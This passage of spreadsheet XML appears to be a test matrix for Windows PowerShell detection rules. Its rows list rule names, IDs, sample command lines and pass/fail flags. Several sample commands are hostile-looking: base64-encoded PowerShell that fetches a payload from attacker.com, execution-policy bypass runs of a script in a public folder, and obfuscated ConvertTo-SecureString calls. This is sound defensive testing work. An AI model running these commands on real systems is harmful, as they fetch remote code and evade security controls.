        </is>
      </c>
      <c r="C1194" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1194" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1194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194" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1194" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1194" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1194" s="4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194" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1194" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1195" ht="15.75" customHeight="1" s="42">
      <c r="A1195" s="43" t="n"/>
      <c r="B1195" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1195" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1195" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1195" s="4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195" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1195" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1195" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1195" s="4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195" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1195" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1196" ht="15.75" customHeight="1" s="42">
      <c r="A1196" s="43" t="n"/>
      <c r="B1196" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1196" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1196" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1196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196" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1196" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1196" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1196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196" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1196" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1197" ht="15.75" customHeight="1" s="42">
      <c r="A1197" s="43" t="n"/>
      <c r="B1197" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1197" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1197" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1197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197" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1197" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1197" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1197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197" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1197" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1198" ht="15.75" customHeight="1" s="42">
      <c r="A1198" s="43" t="n"/>
      <c r="B1198" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1198" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1198" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1198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198" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1198" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1198" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1198" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1198" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1198" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1199" ht="15.75" customHeight="1" s="42">
      <c r="A1199" s="43" t="n"/>
      <c r="B1199" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1199" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1199" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1199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199" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1199" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1199" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1199" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1199" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1199" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1200" ht="15.75" customHeight="1" s="42">
      <c r="A1200" s="43" t="n"/>
      <c r="B1200" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1200" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1200" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1200" s="4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F1200" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1200" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1200" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1200" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1200" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1200" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1201" ht="15.75" customHeight="1" s="42">
      <c r="A1201" s="43" t="n"/>
      <c r="B1201" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1201" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1201" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1201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201" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1201" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1201" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1201" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1201" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1201" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1202" ht="15.75" customHeight="1" s="42">
      <c r="A1202" s="43" t="n"/>
      <c r="B1202" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C1202" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D1202" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E1202" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F1202" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1202" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1202" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1202" s="43" t="n"/>
      <c r="J1202" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1202" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1203" ht="15.75" customHeight="1" s="42">
      <c r="A1203" s="43" t="n"/>
      <c r="B1203" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C1203" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D1203" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E1203" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F1203" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1203" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1203" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1203" s="43" t="n"/>
      <c r="J1203" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1203" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1204" ht="15.75" customHeight="1" s="42">
      <c r="A1204" s="43" t="n"/>
      <c r="B1204" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C1204" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D1204" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E1204" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F1204" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1204" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1204" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1204" s="43" t="n"/>
      <c r="J1204" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1204" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1205" ht="15.75" customHeight="1" s="42">
      <c r="A1205" s="43" t="n"/>
      <c r="B1205" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C1205" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D1205" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E1205" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMaNd "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F1205" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1205" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1205" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1205" s="43" t="n"/>
      <c r="J1205" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1205" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1206" ht="15.75" customHeight="1" s="42">
      <c r="A1206" s="43" t="n"/>
      <c r="B1206" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C1206" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D1206" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E1206" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmanD "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F1206" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1206" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1206" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1206" s="44" t="n"/>
      <c r="J1206" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1206" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1207" ht="15.75" customHeight="1" s="42">
      <c r="A1207" s="43" t="n"/>
      <c r="B1207" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1207" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1207" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1207" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1207" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1207" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1207" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1207" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1207" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1207" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1208" ht="15.75" customHeight="1" s="42">
      <c r="A1208" s="43" t="n"/>
      <c r="B1208" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1208" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1208" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1208" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eNcOdEdComMAND SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1208" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1208" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1208" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1208" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1208" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1208" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1209" ht="15.75" customHeight="1" s="42">
      <c r="A1209" s="43" t="n"/>
      <c r="B1209" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1209" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1209" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1209" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1209" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1209" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1209" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1209" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1209" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1209" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1210" ht="15.75" customHeight="1" s="42">
      <c r="A1210" s="43" t="n"/>
      <c r="B1210" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1210" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1210" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1210" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENcoDeDCoMmANd SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1210" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1210" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1210" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1210" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1210" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1210" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1211" ht="15.75" customHeight="1" s="42">
      <c r="A1211" s="43" t="n"/>
      <c r="B1211" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1211" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1211" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1211" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENCoDEdcoMMaNd SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1211" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1211" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1211" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1211" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1211" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1211" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1212" ht="15.75" customHeight="1" s="42">
      <c r="A1212" s="43" t="n"/>
      <c r="B1212" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1212" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1212" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1212" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eNcODeDcOMmANd SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1212" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1212" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1212" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1212" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1212" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1212" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1213" ht="15.75" customHeight="1" s="42">
      <c r="A1213" s="43" t="n"/>
      <c r="B1213" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1213" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1213" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1213" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -encODEDCOMMand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1213" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1213" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1213" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1213" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1213" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1213" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1214" ht="15.75" customHeight="1" s="42">
      <c r="A1214" s="43" t="n"/>
      <c r="B1214" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1214" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1214" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1214" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1214" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1214" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1214" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1214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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1214" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1215" ht="15.75" customHeight="1" s="42">
      <c r="A1215" s="43" t="n"/>
      <c r="B1215" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1215" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1215" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1215" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -exeCUtioNpoLicy Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1215" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1215" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1215" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1215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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1215" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1216" ht="15.75" customHeight="1" s="42">
      <c r="A1216" s="43" t="n"/>
      <c r="B1216" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1216" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1216" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1216" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXecutIOnPOLIcY Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1216" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1216" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1216" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1216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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1216" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1217" ht="15.75" customHeight="1" s="42">
      <c r="A1217" s="43" t="n"/>
      <c r="B1217" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1217" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1217" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1217" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -FILE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1217" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1217" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1217" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1217" s="4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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1217" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1218" ht="15.75" customHeight="1" s="42">
      <c r="A1218" s="43" t="n"/>
      <c r="B1218" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1218" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1218" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1218" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutionPOliCY Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1218" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1218" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1218" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1218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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1218" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1219" ht="15.75" customHeight="1" s="42">
      <c r="A1219" s="43" t="n"/>
      <c r="B1219" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1219" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1219" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1219" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1219" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1219" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1219" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1219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19" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1219" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1220" ht="15.75" customHeight="1" s="42">
      <c r="A1220" s="43" t="n"/>
      <c r="B1220" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1220" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1220" s="44" t="inlineStr">
        <is>
